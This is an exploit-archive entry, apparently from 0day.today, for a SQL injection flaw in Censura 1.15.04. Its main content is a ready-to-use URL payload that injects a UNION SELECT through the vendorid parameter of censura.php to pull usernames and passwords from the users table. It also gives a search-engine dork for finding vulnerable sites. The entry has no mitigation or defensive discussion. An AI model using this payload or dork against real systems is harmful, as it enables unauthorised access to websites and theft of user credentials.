id: 1824
date: 05/02/2007
title: Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability
author: xoron
cves: 

==================================================================
Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability
==================================================================


==============================================

Censura v1.15.04 (vendorid)  Remote SQL Injection

==============================================

Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

==============================================

google dork: "Powered by: Censura"

vendor: http://www.censura.info/  

==============================================



#  0day.today [2023-03-23]  #